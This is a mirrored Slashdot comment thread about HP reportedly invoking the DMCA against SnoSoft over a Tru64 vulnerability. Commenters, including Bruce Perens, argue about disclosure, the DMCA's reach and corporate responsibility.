Slashdot Mirror


HP Uses DMCA To Quash Vulnerability Publication

Several readers wrote to note that HP has evidently threatened to use the DMCA and computer crime laws against SnoSoft, who found a security flaw in Tru64. The quote from the HP VP is that the accused "could be fined up to $500,000 and imprisoned for up to five years."

241 of 603 comments

  1. Bruce Perens by BoyPlankton · · Score: 5, Insightful

    So this is the real reason HP didn't want Bruce Perens to demonstrate against the DMCA?

    1. Re:Bruce Perens by laserjet · · Score: 2, Offtopic

      Lexmark and Canon are solid competitors. Samsung is also a newcomer to the field. There are many other options than HP.

      --
      Moon Macrosystems. Sun's biggest competitor.
    2. Re:Bruce Perens by Bruce+Perens · · Score: 5, Informative
      I don't know, but I am not happy to hear this at all. And if it's true, I'll take them to task for it. This is the first I've heard of the whole thing.

      Bruce

    3. Re:Bruce Perens by Bruce+Perens · · Score: 5, Informative
      By the way, my phone is 510-526-1165, if you feel the need to talk about this. I leave that line off the hook when I don't want calls, but it's available most of the day.

      Bruce

    4. Re:Bruce Perens by Bruce+Perens · · Score: 4, Interesting
      I just woke up my boss and am in email correspondence with various other people. Obviously, a lot of the people involved are going to be unavailable until tomorrow morning.

      My terms of employment with HP allow me to publicly criticise the company when necessary. I'd rather help them fix the problem so that the criticism is all in the past tense, but the criticism will come if necessary. All I have to go on tonight is news reports.

      Thanks

      Bruce

    5. Re:Bruce Perens by Anonymous Coward · · Score: 3, Funny

      Posting your phone number on /. - damn, I guess you do need that wheelbarrow!

    6. Re:Bruce Perens by laserjet · · Score: 2

      Yes, I know this. Canon does not make all the engines, however. I know which models have Canon engines and which do not.

      I always thought it was funny that HP bought their engines from a competitor. Without Canon, many of their products would not exist.

      HP does write the firmware for their printers, however. I do not consider that a good thing based on recent experiences.

      --
      Moon Macrosystems. Sun's biggest competitor.
    7. Re:Bruce Perens by Shanep · · Score: 2

      What's a good laser printer that has cheap toner/drum replacements?

      How hard does this printer need to work? I purchased a Xerox P8ex about a year ago, which is just a little 600dpi (true) 8ppm laser. The cart you get with it is only half full of toner, but I got almost 3000 A4 pages out of it.

      It has never jammed once either.

      Cost me less than $400 Australian and I recently purchased a 5000 page toner cart for $220 Australian.

      It's a nice little unit that is NOT one of those God awful WinPrinters, so it interprets PCL5 and 6 with an onboard StrongARM CPU motherboard that can be upgraded to 36MB via an older style SIMM socket. It does parallel and USB and works in Linux really nicely or under any other OS as a HP4 PCL printer.

      It's not often that I rave about a product and I think this little printer is great. Cheap, fast enough, and excellent quality output. It has pseudo 1200dpi which only serves to make either the text or the vector graphics look worse, so ignore the 1200dpi hype that's placed on this printer and switch that off in the driver. 600dpi is very sharp anyway and on this printer it's a real 600 dots-as-in-pixels per inch and not a fake dots-as-in-dithered-spots-of-colour which bubble/ink jet makers use to artificially make their printers sound far better than they actually are.

      --
      War crimes, torture, lies, illegal spying... Would someone give Bush a blowjob, already, so he can be impeached?
    8. Re:Bruce Perens by Bruce+Perens · · Score: 5, Interesting
      People really resist the phone. Lots will reply to me here. A few will email. None will call. No kidding. That number has been on my web page for a year, and the calls I get are from the press, and the occasional Nigerian money-laundering scam.

      Bruce

    9. Re:Bruce Perens by Skapare · · Score: 2

      The phone number for HP's chief legal counsel would be better. Get it. Use it.

      --
      now we need to go OSS in diesel cars
    10. Re:Bruce Perens by 0xA · · Score: 4, Interesting

      Bruce,

      I plan to call you tomorrow and follow this up with an email but I imagine both your inbox and telephone line are going to be jammed tomorrow so I will post as well. These are my comments on the situation and my reaction as a customer.

      I have been working with Compaq and HP systems my entire career: Intel based servers, UNIX servers and workstations, printers and software. Working as a retail reseller, VAR and customer I have recommended the purchase of HP and Compaq systems many times in the past and am now in a position to have final authority on what systems are purchased for my company. Our entire infrastructure is based on HP and Compaq products.

      As a customer I must trust my vendors to act quickly and responsibly to give me the tools and information I need to keep my systems secure. Timely, complete vulnerability information and patches are critical to my success here. There is no framework, process or authority that provides for the responsible publication of this information; given the nature of many of the parties involved I doubt there can ever be a comprehensive solution. When a third party (outside of vendor and customer) finds a problem with a piece of software and decides to act irresponsibly the situation gets complicated; the Apache Foundation's problems last month are an example of this. From the news reports on news.com today I believe HP currently finds itself in a similar situation. The information I have been able to find does not paint SnoSoft or their member "Phased" in a good light, I suspect that the group has acted in bad faith or at least "Phased" has acted irresponsibly in the matter. I do not pass judgment on HP's actions in producing a solution for this problem.

      However the comments of Kent Ferson as reported on news.com concern me greatly. By threatening the use of the DMCA or any other criminal statute in this matter, Mr. Ferson has turned the security community on its head. HP's position as a market leader could go a long way to setting this as a precedent in the industry and law, the results of which could be devastating. While I recognize the importance of a group like SnoSoft working with a vendor to coordinate their disclosure with a vendor's fix, this also has to happen in an efficient manner. The good chance that SnoSoft has discovered a problem that others know about or are exploiting can not be ignored. The potential harm that can come from using criminal charges to frustrate or slow this process is hard to express. The responsibility for ensuring my company's systems are secure is mine, I must have the information I need to make responsible decisions on security. If this means removing systems from service until I can secure them then that is what I will do.

      Regardless of the events leading to Mr. Ferson's letter to SnoSoft, HP must clarify their position on this situation. I would hope that you are willing to state that provided no illegal methods were used to discover the vulnerability HP will not pursue criminal prosecution of researchers. If SnoSoft or Phased has acted in bad faith or breach of contract it is a matter for civil courts.

      Aaron Schneider
      Manager, Information Technology
      Fabutan Sun Tan Studios
      Schneider@fabutan.com

    11. Re:Bruce Perens by Alioth · · Score: 2

      You're damned straight there.

      I hate the damned phone. I just don't like to call strangers (I'm fine about calling friends). I have this "calling strangers phobia". It's so bad I won't even call mail-order lines if they have a website where I can do the ordering.

      I think many geeks share this particular phone-fear.

      Having said that, I have been getting better recently. If I still lived in the States, I might have got as far as lifting the receiver, and dialing your number before putting the phone down just as I was going to dial the last digit. As a therapy, I finally bought a cellphone, and I'm using it to help overcome my fear of calling strangers on the phone.

      The trouble with the cellphone is that I end up texting people instead of actually phoning them, so I'm not sure how effective it'll be...

    12. Re:Bruce Perens by zerocool^ · · Score: 2

      Lexmark and Canon are solid competitors. Samsung is also a newcomer to the field. There are many other options than HP.


      Absolutely. The next time I need a high quality enterprise server running a 64 bit Unix based OS for my company, and for some reason we decide to move away from Solaris, I plan to recommend to my boss that we check out the servers from Lexmark and Canon.

      HP makes more than printers.

      ~Will

      --
      sig?
    13. Re:Bruce Perens by jc42 · · Score: 4, Insightful

      > People really resist the phone. Lots will reply to me here. A few will email. None will call.

      To a great extent, this is intentional. One of the real benefits of email and posting replies is that you can stare at your text on the screen, rewrite, check facts, reword, and only hit the Send button when you think you've got it right. Granted, not everyone does this, but many (possibly most) of us do.

      Also, a phone call can easily get lost in the shuffle. A text message sits there until someone deletes it. You can come back to it an hour or a year later. You can toss it into bins and count the pro/con messages. You can grep through your messages looking for keywords.

      I can't see any reason for techies to ever use the phone for issues like this. Posted and emailed replies are so superior.

      Phone calls and face time make sense for communicating with suits. They don't make sense in technical discussions. This is a lot of why Open Source development has been so outpacing corporate software lately. The corporate model has people in a room or on the phone. The Open Source model has everyone communicating via email and mailing lists. The latter is orders of magnitude more effective at getting ideas across without loss or misunderstanding.

      --
      Those who do study history are doomed to stand helplessly by while everyone else repeats it.
    14. Re:Bruce Perens by WNight · · Score: 2

      Canon. They aren't part of this crap in the industry of preventing refills by using a chip that monitors ink levels. They also do separate ink tanks for all the colors, something that saves a ton of money even if you buy all your ink from them. (I do, I wouldn't ever buy a printer whose ink tanks I couldn't refill, but I'm too lazy to actually do it for the $10 difference.)

      And for servers, Sun and SGI. Or, if you don't need hot-swap CPUs, try clusters of commodity boxes. (And do proper rollover, which essentially (by letting you unplug a cluster member without any problems) gives you hotswap CPU capability.)

    15. Re:Bruce Perens by laserjet · · Score: 2

      Jesus Christ. Read the parent to which I replied. He asked for competitors of HP's PRINTERS. Please remove your head from your anus.

      --
      Moon Macrosystems. Sun's biggest competitor.
  2. Apache by vex24 · · Score: 5, Insightful
    Funny how when Apache had a hole released before they had a chance to fix it, they gave off a muted air of annoyance and fur that had been rubbed the wrong way.

    Very mature compared to what big business does. "Wahh wahhh wahh!!! Help us Uncle Sam, we're poor defenseless transnational corporations!" Buncha whiners.

    --

    People shape laws. Not the other way around.

    1. Re:Apache by gmack · · Score: 5, Insightful

      Look at the difference though .. Xforce didn't wait before releasing a patch that failed to fix the problem along with an advisory that didn't grasp the full scope of the bug they found.

      These guys waited a YEAR and HP still hadn't fixed the problem.

  3. Who's laughing at Alan Cox now? by rodgerd · · Score: 5, Insightful

    When Alan Cox originally discussed the notion that companies would (mis)use the DMCA in the security field, he was widely attacked for being silly.

    Anyone still feel like laughing?

    1. Re:Who's laughing at Alan Cox now? by new500 · · Score: 2

      . . .

      Well, if I'd known Alan Cox was going to make such risky and suggestive public comments I'd have slapped him with a DMCA suit of my own so as to shut him up : Charge - accessory to Large Corporations in a conspiracy to violate the security and integrity of my systems and networks, copyright materials and trade secrets by method of concealment of tangible Risk Evaluation Information perpetrated by speaking aloud about the one evil use of this act that once said was too obviously juicy for the Corps not to use. :-)

      I wonder if I could use the DMCA to sue HP or whoever for abetting and encouraging black-hat hackers, and effectively concealing from me the information and tools required to defend myself . . . only partially joking, I'm afraid . .

    2. Re:Who's laughing at Alan Cox now? by Rohan427 · · Score: 4, Insightful

      I actually submitted to LKML - on 8/1/2001 - that the DMCA could be used in this manner, and I also submitted several posts regarding other warnings about other laws. I hate to say I told you/them so, but I did:

      [SNIP of e-mail quote I replied to]
      "It's very simple, and something like this is done all the time in the security industry
      by people who not only enjoy it, but who get paid to do it.

      1) Discover an exploit or a new way of using a known exploit.
      2) Write a trojan, virus, worm, etc. that takes advantage of the exploit.
      3)* Report the exploit to the applicable compan(y/ies), Security Focus, etc. and provide
      the BINARY of your trojan, virus, or whatever so they can test the
      exploit and find a fix.

      * Usually people provide the source code as open software. In this case (for this
      argument) we release it as binary only and keep full rights.

      No law was broken when the trojan, virus, etc. was written and no one can (technically)
      seek prosecution. Under DMCA (at least the way the writers of it have
      used it), anyone attempting to reverse engineer your virus (or whatever) and provide an
      antigen, is liable to you and you can sue them.

      To take another angle, those of us who actively look for exploits in software (because
      companies like M$ fail to do so themselves) risk being sued for doing so.
      This makes jobs like mine EXTREMELY difficult because on the one hand I don't want my
      company using software that will allow Joe Cracker to take over our
      machines, and on the other I don't want the company sued just because I did some
      necessary reverse engineering in order to prevent it (again, because the
      software mfg. can't be trusted to do it themselves).

      PGA

      --
      Paul G. Allen
      UNIX Admin II/Programmer
      Akamai Technologies, Inc.
      www.akamai.com
      Work: xxx-xxx-xxxx
      Cell: xxx-xxx-xxxx"

      (Note: I no longer work for the above referenced company as my office was closed late last year. My statements and views are mine alone and do not, nor ever have, represented the views of Akamai Technologies, Inc. or any of its officers and/or representatives.)

      So, what do _I_ get for my warnings to the kernel developers? Blackballed from the list by the maintainer, in a rather rude fashion IMO. (despite the fact that I've received many a thank you for the information I had provided)

      So, to all those who have read, heard, and seen such warnings, wherever you've read, seen, or heard them, and were asked to take action and do not, I say stop whining, shut up, and suffer. The same thing I tell people who don't vote - if you can't do your part to fight the problem, you have no right to bitch and moan about it.

      My solution to many of these issues is not to support the companies promoting them. I no longer buy CDs, DVDs, or go to movies (yes, I will be missing the second in the LotR series - which I have long awaited.) I do not buy Compaq, and will never buy another HP device. I do not buy M$ products or anything that runs on M$ platforms either. I have written letters to congress critters, etc. as well.

      How many others can say they've actually done their part to fight the DMCA, US Patriot Act, CDBTPA, etc. and/or whatever equivalent laws you may have in your own countries?

      I for one wish more folks in Alan's position would speak up. I commend him for doing his part, and he's not even a US citizen, is he?

      I for one never did laugh at him.

      PGA

    3. Re:Who's laughing at Alan Cox now? by God!+Awful · · Score: 2

      Maybe we should wait to see if they win the case before concluding that the DMCA will allow companies to suppress security flaws. It doesn't sound like they have a legal leg to stand on. If SnoSoft doesn't pursue the case, no doubt the EFF will.

      Also, releasing hacking tools without giving the company a chance to fix the problem still needs to be illegal under some other law or another. The details in this article were pretty vague. There was some vague allegation that they had known about the bug for a year, but there was nothing to suggest that they had a) informed HP about it or b) given HP a moratorium of "fix it by X date or we're going to release the exploit".

      Also, the fact that the "researcher" is named "Phased" kind of makes you wonder about the legitimacy of this "research" group.

      -a

    4. Re:Who's laughing at Alan Cox now? by rodgerd · · Score: 2

      The DMCA allows immediate sanctions (the take down provisions), regardless of the findings of any puny court of law. It also has such massive penalties that it is unlikely that many people will want to even risk being the next Dimitri.

      This is what legal types refer to as a chilling effect; many laws are deliberately written this way in order to promote self-censorship.

    5. Re:Who's laughing at Alan Cox now? by God!+Awful · · Score: 2

      The chilling effect argument is fine and all, except that it's also an argument for never ever passing any new laws. New legislation is always a bit vague and it usually takes a few test cases to set the legal bounds. That's the risk you take when you do something that is borderline legal, as Elcomsoft did. This case is much different because it is HP that is pushing the boundaries and their claim seems pretty baseless. Big companies had the power of intimidation before the DMCA and they'll still have it tomorrow. It doesn't matter whether the claim has merit, only how much money the litigants have. Hell, I'd be freaked out if a big company threatened to sue me for $1,000,000 for not mowing my lawn.

      -a

    6. Re:Who's laughing at Alan Cox now? by rodgerd · · Score: 2

      It's not an argument for never passing any laws - it's an argument for passing well thought out, well written laws which don't leave absurd room for interpretation; you'll notice that in the US, for example, the easiest way to get a law which is constitutionally questionable shot down is for it to be considered "overly broad".

      In the case of the DMCA, the subversion of due process which allows sanctions to be effected simply as the result of an accusing party claiming harm is a perfect example.

      In a tolerably responsible legislature, of course, lawmakers would make sure their laws were framed so as to have the effect desired without causing unnecessary problems. But since the DMCA is basically lobby-driven law, the fact that it's over broad and overreaching is probably the intention of a bought-and-paid-for legislature.

    7. Re:Who's laughing at Alan Cox now? by God!+Awful · · Score: 2

      Everyone on Slashdot likes to call the DMCA a bought-and-paid-for law which proves that congress is corrupt, but I am less cynical than that. These are the same people who believe that copyright is evil and ought to be abolished. That is a view that is rather unique to this crowd. Is it possible that congress simply wants to pass a law that will help to protect copyright?

      "Cease and desist" letters are a standard part of copyright law. It is too much of a burden on the court system (and copyright holder) for them to go to court to get an injunction every time they sense a violation. Therefore, the law requires them to attempt to resolve the dispute out of court first. You may consider that a chilling effect, but it is only a chilling effect when one party has the intimidation factor of a large war chest.

      I don't know what you mean about "sanctions being effected simply as the result of an accusing party claiming harm". You can request that the offending material be removed, but you can't collect any monetary sanctions without going to court. All you can do is threaten to sue, and you can only do that effectively if the accused party thinks they might lose. If they are 100% confident of winning, they might as well go to court and collect the fine for the nuisance suit.

      As I said, I don't believe the DMCA applies here. HP is trying to use an overly broad interpretation of the statute to twist it into something else, and if they go to court they will probably lose.

      -a

    8. Re:Who's laughing at Alan Cox now? by Rohan427 · · Score: 2, Interesting

      Just to show that I put my money where my mouth is, and the possibility that from leading by example others will follow, here's the letter I wrote to the HP CEO (it may never actually get read, and may get ignored, but at least I tried :)

      "First of all, I'd like to say that my product experience with HP and Compaq products has varied. Over all, Compaq products leave a lot to be desired, and though I like and used to recommend HP printers and other peripherals to clients, their reliance upon specific Microsoft software for installation is rather maddening.

      Recently it has come to my attention that HP is in some fashion using the DMCA to suppress the reporting of valid security holes in some of its software. As a computer and security professional of over 24 years, I must say that this policy, as well as the DMCA itself, is severely flawed. A customer has a right to know what they are purchasing and in this case they have the right to know if their data is secure. They also have the right to make certain it is secure by any means possible. As a company providing important software (and hardware) to customers, not the least of which are large corporations, you have an obligation to see to it that the software and hardware you sell them is secure, to the best of your abilities. This obligation must not be thrown aside in a pitiful attempt to protect IP rights (or whatever HP is attempting to protect) and put your customers at risk.

      In addition, this type of stance will only hurt HP in the long run, and make HP more of a target for hate and discontent in the PC market. Because of this announcement, I have removed HP from my list of recommended companies and products, as I'm sure many others will as well.

      The DMCA should never have been allowed to pass, as it has only come to hurt the digital industry worldwide, including the portions that large corporations such as yours bank upon. To date, the DMCA and other such laws governing digital media have only been used to suppress the rights of certain individuals, hamper innovation, and slow technological advances to a crawl. In the future, such poorly thought out laws will further damage the industry and assist in the decline of the US and worldwide economy.

      Companies that support these types of laws are not helping themselves, but only hurting themselves. After all, even large corporations such as HP are consumers and must, in the end, abide by the same laws as the consumer.

      I urge you to take the correct and responsible stance of supporting public knowledge of security flaws and fixing any and all those that your products may have. By suppressing such information, you only put your customers at greater risk because by doing so only those who wish to do harm with the information will have it. Those who wish to help secure systems will not, and those that are subject to the attacks will lose billions in lost time and data. As a security professional formerly with a large corporation, I was constantly under the gun to keep our systems secure. If not for the information freely available to me through public venues, my job would have been an impossible one. My company had over 11,000 systems on public networks. Every one of these had to be secure from crackers (also known as a "malicious hacker", which is the REAL term for the media word "hacker"). It was the responsibility of an entire team of people to keep track of current security holes and make sure they were fixed on ALL systems before the crackers could use them. In many cases, the exploits were never reported to us by the software mfg., but by some unrelated party when they posted the exploit to a public web site. In some cases where we actually found the exploit, and reported it to the mfg., we were ignored until we were forced to report it to the public. Once we had reported it, it did nothing for the companies in question but cause hate and distrust from their customers.

      So you see, you can't have your cake and eat it too. You either must take the responsibility for your product up front and honestly, or reap the consequences of your inaction and attempts at hiding (or whatever it is) later. I often feel that lawyers need to be kept out of technological discussions as most of them have no clue in the area. I would be willing to bet, and in fact I have seen evidence of this, that the reason most laws such as the DMCA are passed is the number of people in and out of congress who really know nothing about technology. It is the responsibility of those of us who are in the know to educate those who are not as to what should be done and why. Unfortunately, most of us are either not in a high enough position (e.g. - the CEO of a large corporation) to make our voices heard, don't care to take the responsibility (and instead sit around and bitch about stupid laws), or are in a position to make a statement but have a specific stake in the passage of said laws.

      I would also urge you to take a stance against all such repressive laws regarding technology. Yes, there are legitimate concerns of copyright infringement, piracy, etc., but there are already laws to deal with these issues. There is also something called "fair use", which includes the right to reverse engineer for educational purposes, edification, personal use, and to innovate. We need to see that these laws are enforced properly, and get away from treating the digital realm as if it is of a completely different universe.

      It is a small minority in the digital world that actually steal copyrighted material, and if the suppressive laws continue to roll, that minority will quickly become a majority. Most that actually steal only do it because they are priced right out of the precious markets that the large corporations are trying so hard to protect. As if making several billion a year is not enough, the prices for such products MUST be raised and we MUST be forced to pay for every second of their use.

      PGA
      --
      Paul G. Allen
      Owner, Sr. Engineer, Security Specialist
      Random Logic/Dream Park
      www.randomlogic.com"

      PGA

    9. Re:Who's laughing at Alan Cox now? by muffen · · Score: 2

      Under DMCA (at least the way the writers of it have used it), anyone attempting to reverse engineer your virus (or whatever) and provide an antigen, is liable to you and you can sue them.

      I believe you are wrong. Working for an antivirus company, I am certain I remember a clause in the DMCA that says that malware is allowed to be reverse engineered. If this was not the case, I would be breaking the DMCA on a daily basis.

    10. Re:Who's laughing at Alan Cox now? by mpe · · Score: 2

      New legislation is always a bit vague and it usually takes a few test cases to set the legal bounds.

      Only if the legislators have failed to do their job properly. When they do, new laws will be clear, non redundant and only passed when actually necessary.

      It doesn't matter whether the claim has merit, only how much money the litigants have. Hell, I'd be freaked out if a big company threatened to sue me for $1,000,000 for not mowing my lawn.

      The difference is that lawyers and judges would probably require a lot more convincing that 1 million dollars was a sensible figure when it came to lawn mowing than anything involving computers.

    11. Re:Who's laughing at Alan Cox now? by Rohan427 · · Score: 2, Interesting

      Upon quickly reviewing the DMCA again, I have found that HP probably has no case whatsoever. The DMCA specifically allows Security Testing and information publication.

      Section 1201(c) states that the DMCA does not circumvent Fair Use.
      Section 1201(f) allows Reverse Engineering.
      Section 1201(g) allows Encryption Research.
      Section 1201(j) allows for Security Testing.

      Several sections allow publishing information.

      I see no references to exceptions for viruses, trojans, worms, etc. written for the purposes of testing and exposing security flaws. In fact, such software seems to be PROTECTED under the DMCA.

      So, I say to HP and all others trying to use the DMCA in this fashion: KMA!!

      Even though the DMCA does NOT prohibit reverse engineering of anything, it has been INTERPRETED in just that way. There are three types of law: the written law, the interpreted law, and case law. To date, the DMCA has not really been used to protect against illegal use of copyrighted material. Instead it has been used to prohibit perfectly legal use of material. As written, the DMCA doesn't prohibit Fair Use and reverse engineering under existing law. As INTERPRETED, at least to date, it does.

      This is one big problem with laws such as this. It's not necessarily the written law that's bad, it's the way it's interpreted. Some laws are written so vaguely that once argued in court, there is a chance that a judge (or jury) will interpret the law incorrectly. This then leads to case law which is later used in support of further rulings on the incorrectly interpreted written law. Some laws are purposefully written poorly so as to be easily passed and then interpreted to mean something different, or something skewed, from what those who passed it were thinking.

      Often laws are used against those who lack the understanding of said law, and used in a venue that may also lack such understanding, in order to dupe the defendant into submission. I've had this tried on me many times, and most people who've ever gotten a traffic ticket, gone to a family court in CA, or had to deal with other courts have as well. I am one who does not take even what my own lawyer has to say for granted. I am one who wants to see the text of the law, all references, and who does his own research.

      IANAL, but I am educated and know how to read quite well, and I've spent enough time in court and with lawyers to have done some research into the law as a whole. I've also read the DMCA and copyright law. Apparently (IMHO) either someone at HP hasn't, or they're hoping others haven't.

      PGA
      --
      Paul G. Allen
      Owner, Sr. Engineer, Security Specialist
      Random Logic/Dream Park
      www.randomlogic.com

    12. Re:Who's laughing at Alan Cox now? by Alan+Cox · · Score: 3, Insightful

      > I no longer buy CDs,

That's a shame. There is a lot of great music on independent labels who have a really good attitude to their fans. They don't hide lyric sheets, they often waive some radio fees and in many cases they work through local recording studios and CD firms helping them to survive and support local music.

I don't know about the USA but the UK has many relatively independent and completely independent small labels (e.g. www.showofhands.co.uk - a band whose musicians actually go around teaching people to play their music, www.madrarua.com (ok I'm biased, they are in Swansea)). When I visited St. John's, Newfoundland I was amazed at the huge, mostly independent and deeply vibrant music culture there.

    13. Re:Who's laughing at Alan Cox now? by afidel · · Score: 2

Actually the DMCA IS a bought and paid for law. Do you think that any congressmen or their staffers penned any significant portion of this law? The answer would be no; the lawyers and lobbyists for the media companies wrote the law and left it as vague as they thought they could get away with so as to allow them a big hammer for hitting the evil pirates who would make "perfect digital copies" of their precious works of entertainment. I do not believe that the concept of copyright or any of the other intellectual property protection mechanisms is bad, but I do believe that current implementations are bad, with the DMCA being the worst example.

      p.s.
Did you know that almost no one alive today has seen anything created during their life enter the public domain? Thanks to Disney's uberlust to make sure Steamboat Willie and other classic films do not enter the public domain, we now have a copyright term that is effectively unending. Do I think that a film or other work should be protected long enough for studios to have an opportunity to recoup their expenses and make some profit? Sure I do. Do I think they should be allowed to never give up their state granted monopoly and live up to the other part of the bargain (that being that they have to give their work to the commons)? No, definitely not.

      --
      There are 4 boxes to use in the defense of liberty: soap, ballot, jury, ammo. Use in that order. Starting now.
  4. FUCK HP by Anonymous Coward · · Score: 2, Insightful

Here's another fucking BIG CORP trying to strong-arm to get their way.

Fuck HP. It's like Ford trying to get the safety concerns of the Pinto hushed up.

    Consumers are in danger, and WE COME FIRST.

  5. Meanwhile..... by shoemakc · · Score: 5, Funny

    Halfway around the world, Bill Gates breathes a long sigh of relief as Microsoft's profitability is assured well into the next century...

    -Chris

    --
    --an unbreakable toy is useful for breaking other toys--
  6. If they sue and lose, it helps. by fishbowl · · Score: 2

    If suits like this go to trial, and don't result in huge gains for the plaintiff, the caselaw will tend to discourage others. In some ways that would be better than a repeal.

    --
    -fb Everything not expressly forbidden is now mandatory.
  7. An Excellent Quote by unsinged+int · · Score: 5, Insightful

    Finisterre said that while he wanted to resolve the dispute with HP, he resented receiving DMCA threats. "We are like the guys that found out that Firestone tires have issues on Ford explorers," he said. "It's not our fault your Explorer has crap tires. We just pointed it out. We should not get attacked for pointing out issues in someone's product nor for proving it is possible."

    When will people learn this is the same thing?

    1. Re:An Excellent Quote by rodgerd · · Score: 3, Insightful

Why, when the media conglomerates who lobbied for this bill use the newspapers (they own), TV news and documentaries (they own) and radio shows (they own) to explain to people why the DMCA is such a bad idea, and what the negative ramifications of it are.

      I'm sure the congressmen (they own) will also take a responsible line, and won't conflate these kinds of issues with actual breaches of copyright, terrorism, or other acts most people consider unacceptable.

    2. Re:An Excellent Quote by richieb · · Score: 4, Insightful
      Some people might argue, that by publicizing a security hole, more people will try to take advantage of that hole, and will compromise security for anyone using the product.

      So, to carry the Ford Explorer analogy, they should've stayed quiet until the manufacturer recalled all the tires?

HP had a year to deal with this! Why don't they hire some programmers, instead of lawyers?

      --
      ...richie - It is a good day to code.
    3. Re:An Excellent Quote by silentbozo · · Score: 2

It can also be argued that by publicizing the tire defect, the media exposed Ford to a ton of lawsuits by lawsuit-happy lawyers. If they had only shut up until Ford had covered up the problem, Ford wouldn't have had to spend all that money trying to whitewash their image, laying blame on Firestone, and quietly paying off the families of those killed in Firestone/Ford related accidents.

      Obviously this argument is pure bullshit, and so is the argument that publicizing security holes encourages more people to exploit them. Of course it does - BUT THAT'S NOT THE POINT. The point is to FIX THE PROBLEM so nobody else has to suffer for it! If it takes lawsuits against manufacturers of defective products, or active exploits to illustrate how much of a threat a weakness is, then that's what it has to take!

8. This is ridiculous! by SunCrushr · · Score: 2, Insightful

    Finding and publishing a security hole in an OS is not a way to circumvent copyright protection.
If I take over somebody's Tru64 machine via this security hole, I haven't broken copyright at all.
    Now, if I take documents off of the server, then I may be breaking copyright, but I don't think the connection is strong enough to stand up in a court of law.
    I could hold up a book store with a gun and make them give me their books. I've stolen the books and therefore broken copyright. Does that mean we should ban guns since they are a possible copyright protection circumvention device?

1. Re:This is ridiculous! by quantum+bit · · Score: 2

      I could hold up a book store with a gun and make them give me their books. I've stolen the books and therefore broken copyright.

Um, no, you've committed armed robbery and theft of property. Stealing books doesn't violate any copyright laws. Now if you then go to a Xerox machine and start making unauthorized copies, then you'd be infringing copyright.

      Does that mean we should ban guns since they are a possible copyright protection circumvention device?

      No, but apparently we should ban Xerox machines.

2. Re:This is ridiculous! by Fjord · · Score: 2

      That's silly. Xerox machines are analog copying devices. It's digital ones that are bad.

      not entirely serious. not entirely joking.

      --
      -no broken link
  9. Bruce, it's time for you to make a decision by JoeBuck · · Score: 4, Insightful

    It was legitimate for you to cooperate with HP's valid concern that, as a "deep pockets" organization it would be too risky for them to let you challenge the DMCA. I understood that.

    But now it appears that you work for a company that is using the DMCA as a club to suppress discussion of security flaws. It doesn't seem that the two hats you wear (your HP role and your open source leadership role) are compatible unless you can persuade HP to back off.

    It is possible, of course, that the DMCA threat is coming from one manager who is shooting his mouth off. If so, we need a clarification from higher management: is it the policy of HP to use the DMCA to suppress discussion of their security flaws, or not?

    1. Re:Bruce, it's time for you to make a decision by clark625 · · Score: 2

      This seems a little hypocritical, sure, but I don't think it is unacceptable. Yeah, it's perhaps somewhat unethical. And yeah, I wish they wouldn't do things like this.

      But let's consider this from another stance: HP is a large corporation and they do have a duty to their shareholders. Letting Bruce (or any other employee) clearly violate any federal law (whether constitutional or otherwise) isn't something the shareholders would want. I hate the DMCA, too, and I'm sure that HP doesn't much want it, either. But they can't just violate the law without expectation of legal suit--and the owners aren't gonna like that.

      That said, why can't HP use the DMCA against itself? This type of thing is exactly why most of us think the DMCA is so terrible. In a way, I think this is a good thing. If HP uses this stupid law to brow-beat enough people "because they can" and "because it's good for shareholders", then the sooner we can get stupid laws repealed. I'm not against that.

      I realize that this isn't a popular opinion here on /., but it's only karma. I just wish people would stop believing that any company exists for any reason other than to increase the wealth of its shareholders. Sorry folks, this is just the American way.

      --
      Long, cute, or funny Sigs are just another form of over compensation, used by geeks, nerdz, etc.
    2. Re:Bruce, it's time for you to make a decision by crawling_chaos · · Score: 2
      I just wish people would stop believing that any company exists for any reason other than to increase the wealth of its shareholders. Sorry folks, this is just the American way.

      I don't think it's HP, the Company, that the parent post is addressed to. It's addressed to Bruce Perens, the Man. It's time for him to make a statement, one way or the other. I'd be very interested in what he has to say about this, and I'm reserving judgement until he does speak, or allows a long enough period of silence to speak for him.

      Sorry, it's just the human way.

      --
      You can only drink 30 or 40 glasses of beer a day, no matter how rich you are.
      -- Colonel Adolphus Busch
    3. Re:Bruce, it's time for you to make a decision by Glytch · · Score: 2

      Newsflash: The American Way is a crock of shit. It's a Bad Thing. It doesn't work. Tu comprende? It destroys lives, and turns citizens into serfs, trying to make just enough money to send their yearly tithe to the monarch and not starve.

And the stock market is a crock of shit too. "Duty to shareholders". Fuck that. I'd rather buy from private companies, utterly dependent on pleasing their customers, without the useless distraction of some arbitrary share price.

    4. Re:Bruce, it's time for you to make a decision by TellarHK · · Score: 3, Insightful

I suspect Bruce won't be able to reply here for legal reasons (though he may be able, we'll see) but he's definitely reading, I think we can all guess that. HPaq is going to be increasingly difficult to work with in the future, by any guess I think I can make. They're bigger, they're badder, more bloated, and they're aiming at a much more demanding and volatile market, so any "advantage" they can use to squash the appearance of failure or flaw is going to be rapidly pounced upon before they suffer the fate of any large star that runs out of power. The DMCA is just today's big stick. Will they bring out a bigger one later?

      Does this cause Bruce to reconsider his employer? Only Bruce knows. Does this cause us to want him to make a statement by resigning or taking some other action? I suspect so. But I don't want to see the community pushing him toward a decision that isn't in his best interests. I think we just need to sit back and wait, to see what happens next.

    5. Re:Bruce, it's time for you to make a decision by gilroy · · Score: 5, Insightful
Blockquoth the poster:
      I just wish people would stop believing that any company exists for any reason other than to increase the wealth of its shareholders.
      I just wish people would stop believing that any company exists for the sole reason of increasing the wealth of its shareholders. It used to be that people believed in ethics -- that there are societal responsibilities that compete with shareholder equity. Of course it used to be that the primary purpose of a company was to produce something, which something would hopefully allow a profit.

      You know it is possible -- and ethical! -- to not do something because it goes too far. Or is HP obligated to murder someone if it increases shareholder profit? And before you say, "Well, the law imposes too high a cost", answer me this: What if you could prove the legal sanction was less than the profit realized? Should HP kill the person? Must they?

    6. Re:Bruce, it's time for you to make a decision by ChaosDiscord · · Score: 5, Interesting
      I just wish people would stop believing that any company exists for any reason other than to increase the wealth of its shareholders. Sorry folks, this is just the American way.

The American way is the right to Life, Liberty, and the pursuit of Happiness. The American way is that no law shall abridge freedom of speech or of the press.

"The only law shalt be maximize your stock price at all costs" is part of something worse. It isn't even part of the Capitalist way, for true capitalism only works with wide availability of information and strong competition. This is the inbred freak son of Capitalism and Greed. This is the way of life of scam artists, shysters, hucksters, thieves. This is the Monopolist's Way.

